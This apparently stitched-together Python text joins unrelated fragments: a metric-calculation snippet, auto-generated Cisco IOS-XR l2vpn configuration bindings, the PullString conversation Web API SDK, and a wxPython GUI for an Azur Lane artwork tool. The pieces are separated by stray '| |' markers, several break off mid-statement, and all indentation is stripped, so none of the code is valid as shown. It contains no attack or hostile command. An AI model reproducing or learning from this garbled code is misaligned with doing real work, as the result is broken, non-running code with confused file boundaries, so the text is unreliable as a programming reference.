f.write('%s\t%s\t%d\t%s\t%f\t%f\t%f\n' % (pct, 'Alu', tot, desc, aligned, correct, overall))
tot = ntotal_cent
cor = ncorrect_cent
inc = nincorrect_cent
if tot > 0:
aligned = float(cor+inc)/tot
overall = float(cor)/tot
if (cor+inc) == 0:
correct = -1
else:
correct | |
is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:aps'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.enable is not None:
return True
if self.level is not None:
return True
if self.port0 is not None:
return True
if self.port1 is not None and self.port1._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
if self.erp_instance_id is None:
raise YPYModelError('Key property erp_instance_id is None')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:erp-instance[Cisco-IOS-XR-l2vpn-cfg:erp-instance-id = ' + str(self.erp_instance_id) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.erp_instance_id is not None:
return True
if self.aps is not None and self.aps._has_data():
return True
if self.description is not None:
return True
if self.inclusion_list is not None:
return True
if self.profile is not None:
return True
if self.rpl is not None and self.rpl._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:erp-instances'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.erp_instance is not None:
for child_ref in self.erp_instance:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info']
class ErpPort1S(object):
"""
Ethernet ring protection port0
.. attribute:: erp_port1
Ethernet ring protection port1
**type**\: list of :py:class:`ErpPort1 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.erp_port1 = YList()
self.erp_port1.parent = self
self.erp_port1.name = 'erp_port1'
class ErpPort1(object):
"""
Ethernet ring protection port1
.. attribute:: erp_port_type <key>
Port1 type
**type**\: :py:class:`ErpPortEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.ErpPortEnum>`
.. attribute:: none
none
**type**\: :py:class:`None_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_>`
**presence node**\: True
.. attribute:: virtual_or_interface
virtual or interface
**type**\: list of :py:class:`VirtualOrInterface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.erp_port_type = None
self.none = None
self.virtual_or_interface = YList()
self.virtual_or_interface.parent = self
self.virtual_or_interface.name = 'virtual_or_interface'
class None_(object):
"""
none
.. attribute:: monitor
Ethernet ring protection port1 monitor
**type**\: str
**pattern:** (([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+\\.\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]\*\\d+))\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]+))\|([a\-zA\-Z0\-9\_\-]\*\\d+)\|([a\-zA\-Z0\-9\_\-]\*\\d+\\.\\d+)\|(mpls)\|(dwdm)
.. attribute:: _is_presence
Is present if this instance represents presence container else not
**type**\: bool
This class is a :ref:`presence class<presence-class>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self._is_presence = True
self.monitor = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:none'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self._is_presence:
return True
if self.monitor is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_']['meta_info']
class VirtualOrInterface(object):
"""
virtual or interface
.. attribute:: interface_name <key>
Port1 interface
**type**\: str
**pattern:** (([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+\\.\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]\*\\d+))\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]+))\|([a\-zA\-Z0\-9\_\-]\*\\d+)\|([a\-zA\-Z0\-9\_\-]\*\\d+\\.\\d+)\|(mpls)\|(dwdm)
.. attribute:: monitor
Ethernet ring protection port1 monitor
**type**\: str
**pattern:** (([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+\\.\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]\*\\d+))\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]+))\|([a\-zA\-Z0\-9\_\-]\*\\d+)\|([a\-zA\-Z0\-9\_\-]\*\\d+\\.\\d+)\|(mpls)\|(dwdm)
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.interface_name = None
self.monitor = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
if self.interface_name is None:
raise YPYModelError('Key property interface_name is None')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:virtual-or-interface[Cisco-IOS-XR-l2vpn-cfg:interface-name = ' + str(self.interface_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.interface_name is not None:
return True
if self.monitor is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
if self.erp_port_type is None:
raise YPYModelError('Key property erp_port_type is None')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:erp-port1[Cisco-IOS-XR-l2vpn-cfg:erp-port-type = ' + str(self.erp_port_type) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.erp_port_type is not None:
return True
if self.none is not None and self.none._has_data():
return True
if self.virtual_or_interface is not None:
for child_ref in self.virtual_or_interface:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-l2vpn-cfg:erp-port1s'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.erp_port1 is not None:
for child_ref in self.erp_port1:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info']
@property
def _common_path(self):
if self.g8032_ring_name is None:
raise YPYModelError('Key property g8032_ring_name is None')
return '/Cisco-IOS-XR-l2vpn-cfg:l2vpn/Cisco-IOS-XR-l2vpn-cfg:database/Cisco-IOS-XR-l2vpn-cfg:g8032-rings/Cisco-IOS-XR-l2vpn-cfg:g8032-ring[Cisco-IOS-XR-l2vpn-cfg:g8032-ring-name = ' + str(self.g8032_ring_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.g8032_ring_name is not None:
return True
if self.erp_instances is not None and self.erp_instances._has_data():
return True
if self.erp_port0s is not None and self.erp_port0s._has_data():
return True
if self.erp_port1s is not None and self.erp_port1s._has_data():
return True
if self.erp_provider_bridge is not None:
return True
if self.exclusion_list is not None:
return True
if self.open_ring is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-l2vpn-cfg:l2vpn/Cisco-IOS-XR-l2vpn-cfg:database/Cisco-IOS-XR-l2vpn-cfg:g8032-rings'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return True
def _has_data(self):
if not self.is_config():
return False
if self.g8032_ring is not None:
for child_ref in self.g8032_ring:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_l2vpn_cfg as meta
return meta._meta_table['L2Vpn.Database.G8032Rings']['meta_info']
class XconnectGroups(object):
"""
List of xconnect groups
.. attribute:: xconnect_group
Xconnect group
**type**\: list of :py:class:`XconnectGroup <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.xconnect_group = YList()
self.xconnect_group.parent = self
self.xconnect_group.name = 'xconnect_group'
class XconnectGroup(object):
"""
Xconnect group
.. attribute:: name <key>
Name of the xconnect group
**type**\: str
**length:** 0..32
.. attribute:: mp2mp_xconnects
List of multi point to multi point xconnects
**type**\: :py:class:`Mp2MpXconnects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects>`
.. attribute:: p2p_xconnects
List of point to point xconnects
**type**\: :py:class:`P2PXconnects <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.name = None
self.mp2mp_xconnects = L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects()
self.mp2mp_xconnects.parent = self
self.p2p_xconnects = L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects()
self.p2p_xconnects.parent = self
class P2PXconnects(object):
"""
List of point to point xconnects
.. attribute:: p2p_xconnect
Point to point xconnect
**type**\: list of :py:class:`P2PXconnect <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect>`
"""
_prefix = 'l2vpn-cfg'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.p2p_xconnect = YList()
self.p2p_xconnect.parent = self
self.p2p_xconnect.name = 'p2p_xconnect'
class P2PXconnect(object):
"""
Point to point xconnect
.. attribute:: name <key>
Name of the point to point xconnect
**type**\: str
**length:** 0..38
.. attribute:: attachment_circuits
List of attachment circuits
**type**\: :py:class:`AttachmentCircuits <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits>`
.. attribute:: backup_attachment_circuits
List of backup attachment circuits
**type**\: :py:class:`BackupAttachmentCircuits <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits>`
.. attribute:: interworking
Interworking
**type**\: :py:class:`InterworkingEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.InterworkingEnum>`
.. attribute:: monitor_sessions
List of Monitor session segments
**type**\: :py:class:`MonitorSessions <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions>`
.. attribute:: p2p_description
cross connect description Name
**type**\: str
**length:** 0..64
.. attribute:: pseudowire_evpns
List of EVPN Services
**type**\: :py:class:`PseudowireEvpns <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns>`
.. attribute:: pseudowire_routeds
List of pseudowire\-routed
**type**\: :py:class:`PseudowireRouteds <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds>`
.. attribute:: pseudowires
List of pseudowires
**type**\: :py:class:`Pseudowires <ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg.L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires>`
"""
_prefix | |
# -*- coding: utf-8 -*-
#
# A module to interface with PullString's Web API.
#
# Copyright (c) 2016 PullString, Inc.
#
# The following source code is licensed under the MIT license.
# See the LICENSE file, or https://opensource.org/licenses/MIT.
#
"""
PullString Python SDK
This package provides a module to access the PullString Web API.
For more details, see http://pullstring.com/.
"""
# Define the module metadata
__copyright__ = "Copyright 2016-2017 PullString, Inc."
__version__ = "1.0.2"
__license__ = "MIT"
__contributors__ = []
# Define the set of outputs
OUTPUT_DIALOG = "dialog"
OUTPUT_BEHAVIOR = "behavior"
# Define the list of entity types
ENTITY_LABEL = "label"
ENTITY_COUNTER = "counter"
ENTITY_FLAG = "flag"
# Define the audio formats for sending audio to the server
FORMAT_RAW_PCM_16K = "raw_pcm_16k"
FORMAT_WAV_16K = "wav_16k"
# The asset build type to request for Web API requests
BUILD_SANDBOX = "sandbox"
BUILD_STAGING = "staging"
BUILD_PRODUCTION = "production"
# The Action to take for a conversation when new content is published
IF_MODIFIED_RESTART = "restart"
IF_MODIFIED_UPDATE = "update"
IF_MODIFIED_NOTHING = "nothing"
# Define the various feature sets that this SDK can support
FEATURE_STREAMING_ASR = "streaming-asr"
class Phoneme(object):
"""
Describe a single phoneme for an audio response, e.g., to drive automatic lip sync.
"""
def __init__(self, name="", secs_since_start=0.0):
self.name = name
self.seconds_since_start = secs_since_start
class Entity(object):
"""
Base class to describe a single entity, such as a label, counter, or flag.
"""
def __init__(self, name, type):
self.name = name
self.type = type
class Label(Entity):
"""
Subclass of Entity to describe a single Label.
"""
def __init__(self, name="", value=""):
Entity.__init__(self, name, ENTITY_LABEL)
self.value = value
class Counter(Entity):
"""
Subclass of Entity to describe a single Counter.
"""
def __init__(self, name="", value=0):
Entity.__init__(self, name, ENTITY_COUNTER)
self.value = value
class Flag(Entity):
"""
Subclass of Entity to describe a single Flag.
"""
def __init__(self, name="", value=False):
Entity.__init__(self, name, ENTITY_FLAG)
self.value = value
class Output(object):
"""
Base class for outputs that are of type dialog or behavior.
"""
def __init__(self, output_id, type):
self.id = output_id
self.type = type
class DialogOutput(Output):
"""
Subclass of Output that represents a dialog response.
"""
def __init__(self, output_id=""):
Output.__init__(self, output_id, OUTPUT_DIALOG)
self.text = ""
self.uri = ""
self.duration = 0.0
self.phonemes = []
self.character = ""
self.user_data = ""
def __str__(self):
str = self.text
if self.character:
str = self.character + ": " + str
return str
class BehaviorOutput(Output):
"""
Subclass of Output that represents a behavior response.
"""
def __init__(self, output_id=""):
Output.__init__(self, output_id, OUTPUT_BEHAVIOR)
self.behavior = ""
self.parameters = {}
def __str__(self):
result = self.behavior
if self.parameters:
result += ": " + str(self.parameters)
return result
class Status(object):
"""
Describe the status and any errors from a Web API response.
"""
def __init__(self, code=200, message="success"):
self.status_code = code
self.error_message = message
@property
def success(self):
return self.error_message == "success"
class Response(object):
"""
Describe a single response from the PullString Web API.
"""
def __init__(self):
self.outputs = []
self.entities = []
self.status = Status()
self.conversation_endpoint = ""
self.last_modified = ""
self.etag = ""
self.conversation_id = ""
self.participant_id = ""
self.timed_response_interval = -1
self.asr_hypothesis = ""
class Request(object):
"""
Describe the parameters for a request to the PullString Web API.
"""
def __init__(self, api_key="", participant_id=""):
self.api_key = api_key
self.participant_id = participant_id
self.build_type = BUILD_PRODUCTION
self.time_zone_offset = 0
self.conversation_id = ""
self.language = ""
self.locale = ""
self.if_modified = IF_MODIFIED_NOTHING
self.restart_if_modified = True
class VersionInfo(object):
"""
A class to provide version information about this implementation of the PullString SDK.
"""
# class variable to store the API base URL for all requests
__API_BASE_URL = "https://conversation.pullstring.ai/v1"
# class variable to store the API base headers for all requests
__API_BASE_HEADERS = {}
@property
def api_base_url(self):
return VersionInfo.__API_BASE_URL
@api_base_url.setter
def api_base_url(self, new_url):
VersionInfo.__API_BASE_URL = new_url
@property
def api_base_headers(self):
return VersionInfo.__API_BASE_HEADERS
@api_base_headers.setter
def api_base_headers(self, new_headers):
VersionInfo.__API_BASE_HEADERS = new_headers
def __get_api_version(self):
"""
Return the current Web API version number, e.g., "1".
"""
try:
import re
return int(re.sub(r'.*/v([0-9]+).*', r'\1', self.api_base_url))
except:
return 0
api_version = property(__get_api_version)
def has_feature(self, feature_name):
"""
Return True if the specified feature is supported by this implementation.
"""
if feature_name == FEATURE_STREAMING_ASR:
return True
return False
class Conversation(object):
"""
The Conversation object lets you interface with PullString's Web API.
To initiate a conversation, you call the start() function, providing
the PullString project ID and a Request() object that must specify
your API Key. The API Key will be remembered for future requests to
the same Conversation instance.
The response from the Web API is returned as a Response() object,
which can contain zero or more outputs, including lines of dialog
or behaviors.
You can send input to the Web API using the various send_XXX()
functions, e.g., use send_text() to send a text input string
or send_audio() to send 16-bit LinearPCM audio data.
"""
def __init__(self):
self.__last_request = None
self.__last_response = None
self.debug_mode = False
def start(self, project_id, request=None):
"""
Start a new conversation with the Web API and return the response.
You must specify the PullString project ID and a Request
object that specifies your valid API key.
"""
import json
# get the project ID into a canonical form
project_id = project_id.lower().strip()
# setup the parameters to start a new conversation
body = {}
body['project'] = project_id
if request and request.time_zone_offset >= 0:
body['time_zone_offset'] = request.time_zone_offset
if request and request.participant_id:
body['participant'] = request.participant_id
if request and request.build_type == BUILD_SANDBOX:
body['build_type'] = 'sandbox'
if request and request.build_type == BUILD_STAGING:
body['build_type'] = 'staging'
# calling start clears out any previous request/response state
self.__last_request = None
self.__last_response = None
# send the request to the Web API
endpoint = self.__get_endpoint(add_id=False)
return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def send_text(self, text, request=None):
"""
Send user input text to the Web API and return the response.
"""
import json
body = { "text" : text }
endpoint = self.__get_endpoint(add_id=True)
return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def send_intent(self, intent, entities=None, request=None):
"""
Send an intent as user input to the Web API and return the response.
"""
import json
body = { "intent" : intent}
if entities is not None:
values = {}
for entity in entities:
values[entity.name] = entity.value
body["set_entities"] = values
endpoint = self.__get_endpoint(add_id=True)
return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def send_activity(self, activity, request=None):
"""
Send an activity name or ID to the Web API and return the response.
"""
import json
body = { "activity" : activity }
endpoint = self.__get_endpoint(add_id=True)
return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def send_event(self, event, parameters={}, request=None):
"""
Send a named event to the Web API and return the response.
"""
import json
ev = {}
ev['name'] = event
ev['parameters'] = parameters
body = {'event': ev}
endpoint = self.__get_endpoint(add_id=True)
return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def check_for_timed_responses(self, request=None):
"""
Call the Web API to see if there is a time-based response to process.
You only need to call this if the previous response returned a value
for timed_response_interval >= 0. In which case, you should set a timer
for that number of seconds and then call this function.
This function will return None if there is no time-based response.
"""
# nothing to do if no previous response, or it had no time based interval
if not self.__last_response or self.__last_response.timed_response_interval < 0:
return None
# send an empty body to trigger the Web API checking for a timed response
endpoint = self.__get_endpoint(add_id=True)
return self.__send_request(endpoint=endpoint, body="{}", request=request)
def goto(self, response_id, request=None):
"""
Jump the conversation directly to the response with the specified GUID.
"""
import json
body = { "goto" : response_id }
endpoint = self.__get_endpoint(add_id=True)
return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def get_entities(self, entities, request=None):
"""
Request the value of the specified entities from the Web API.
"""
import json
names = []
for entity in entities:
names.append(entity.name)
body = { 'get_entities': names }
endpoint = self.__get_endpoint(add_id=True)
return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def set_entities(self, entities, request=None):
"""
Change the value of the specified entities via the Web API.
"""
import json
values = {}
for entity in entities:
values[entity.name] = entity.value
body = { 'set_entities': values }
endpoint = self.__get_endpoint(add_id=True)
return self.__send_request(endpoint=endpoint, body=json.dumps(body), request=request)
def send_audio(self, bytes, format=FORMAT_RAW_PCM_16K, request=None):
"""
Send an entire audio sample of the user speaking to the Web
API. The default format | |
# -*- coding: utf-8 -*-
###########################################################################
## Python code generated with wxFormBuilder (version Oct 26 2018)
## http://www.wxformbuilder.org/
##
## PLEASE DO *NOT* EDIT THIS FILE!
###########################################################################
import wx
import wx.xrc
import wx.adv
###########################################################################
## Class MyFrame1
###########################################################################
class MyFrame1 ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"碧蓝航线立绘还原", pos = wx.DefaultPosition, size = wx.Size( 1024,720 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
self.m_menubar2 = wx.MenuBar( 0 )
self.menu_file = wx.Menu()
self.m_menu_file = wx.Menu()
self.m_menuItem_tex = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"加载 Texture2D 文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_tex )
self.m_menuItem_mesh = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"加载 Mesh 文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_mesh )
self.m_menu_file.AppendSeparator()
self.m_menuItem_rgb = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"加载RGB通道文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_rgb )
self.m_menuItem_rgb.Enable( False )
self.m_menuItem_alpha = wx.MenuItem( self.m_menu_file, wx.ID_ANY, u"加载alpha通道文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_file.Append( self.m_menuItem_alpha )
self.m_menuItem_alpha.Enable( False )
self.menu_file.AppendSubMenu( self.m_menu_file, u"加载文件" )
self.m_menu_fold = wx.Menu()
self.m_menuItem_mix = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载 Texture2D && Mesh", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_mix )
self.m_menuItem_texonly = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载 Texture2D", u"选择贴图的文件夹", wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_texonly )
self.m_menuItem_meshonly = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载 Mesh ", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_meshonly )
self.m_menu_fold.AppendSeparator()
self.m_menuItem_rgb_a = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载RGB && Alpha", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_rgb_a )
self.m_menuItem_rgb_a.Enable( False )
self.m_menuItem_rgb_f = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载RGB", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_rgb_f )
self.m_menuItem_rgb_f.Enable( False )
self.m_menuItem_alpha_f = wx.MenuItem( self.m_menu_fold, wx.ID_ANY, u"加载Alpha", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_fold.Append( self.m_menuItem_alpha_f )
self.m_menuItem_alpha_f.Enable( False )
self.menu_file.AppendSubMenu( self.m_menu_fold, u"加载文件夹" )
self.menu_file.AppendSeparator()
self.m_menuItem_exit = wx.MenuItem( self.menu_file, wx.ID_ANY, u"退出", wx.EmptyString, wx.ITEM_NORMAL )
self.menu_file.Append( self.m_menuItem_exit )
self.m_menubar2.Append( self.menu_file, u"文件" )
self.m_menu_export = wx.Menu()
self.m_menuItem_all = wx.MenuItem( self.m_menu_export, wx.ID_ANY, u"导出全部", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_export.Append( self.m_menuItem_all )
self.m_menuItem_all.Enable( False )
self.m_menuItem_choice = wx.MenuItem( self.m_menu_export, wx.ID_ANY, u"导出选择的文件", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_export.Append( self.m_menuItem_choice )
self.m_menuItem_choice.Enable( False )
self.m_menuItem_copy_only = wx.MenuItem( self.m_menu_export, wx.ID_ANY, u"把不符合条件的文件直接导出", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_export.Append( self.m_menuItem_copy_only )
self.m_menuItem_copy_only.Enable( False )
self.m_menu_search = wx.Menu()
self.m_menuItem_tex_search = wx.MenuItem( self.m_menu_search, wx.ID_ANY, u"Texture结果", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_search.Append( self.m_menuItem_tex_search )
self.m_menuItem_tex_search.Enable( False )
self.m_menuItem_mesh_search = wx.MenuItem( self.m_menu_search, wx.ID_ANY, u"Mesh结果", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_search.Append( self.m_menuItem_mesh_search )
self.m_menuItem_mesh_search.Enable( False )
self.m_menuItem_unable_search = wx.MenuItem( self.m_menu_search, wx.ID_ANY, u"不符合条件结果", wx.EmptyString, wx.ITEM_NORMAL )
self.m_menu_search.Append( self.m_menuItem_unable_search )
self.m_menuItem_unable_search.Enable( False )
self.m_menu_export.AppendSubMenu( self.m_menu_search, u"导出搜索结果" )
self.m_menubar2.Append( self.m_menu_export, u"导出" )
self.SetMenuBar( self.m_menubar2 )
bSizer28 = wx.BoxSizer( wx.HORIZONTAL )
self.m_panel12 = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
bSizer15 = wx.BoxSizer( wx.VERTICAL )
bSizer40 = wx.BoxSizer( wx.HORIZONTAL )
self.m_bpButton_quick = wx.BitmapButton( self.m_panel12, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW|0 )
self.m_bpButton_quick.SetBitmap( wx.ArtProvider.GetBitmap( wx.ART_EXECUTABLE_FILE, wx.ART_BUTTON ) )
self.m_bpButton_quick.SetBitmapPressed( wx.ArtProvider.GetBitmap( wx.ART_EXECUTABLE_FILE, wx.ART_BUTTON ) )
self.m_bpButton_quick.SetBitmapCurrent( wx.ArtProvider.GetBitmap( wx.ART_GO_FORWARD, wx.ART_BUTTON ) )
self.m_bpButton_quick.SetBitmapPosition( wx.LEFT )
bSizer40.Add( self.m_bpButton_quick, 0, wx.ALL, 5 )
self.m_staticText_qiuke = wx.StaticText( self.m_panel12, wx.ID_ANY, u"快速导出", wx.DefaultPosition, wx.DefaultSize, 0 )
self.m_staticText_qiuke.Wrap( -1 )
bSizer40.Add( self.m_staticText_qiuke, 0, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 )
self.m_gauge_quick = wx.Gauge( self.m_panel12, wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL )
self.m_gauge_quick.SetValue( 0 )
bSizer40.Add( self.m_gauge_quick, 1, wx.ALL|wx.ALIGN_CENTER_VERTICAL, 5 )
bSizer15.Add( bSizer40, 0, wx.EXPAND, 5 )
sbSizer_load_mesh = wx.StaticBoxSizer( wx.StaticBox( self.m_panel12, wx.ID_ANY, u"Mesh" ), wx.HORIZONTAL )
self.m_gauge_mesh_load = wx.Gauge( sbSizer_load_mesh.GetStaticBox(), wx.ID_ANY, 100, wx.DefaultPosition, wx.DefaultSize, wx.GA_HORIZONTAL )
self.m_gauge_mesh_load.SetValue( 0 )
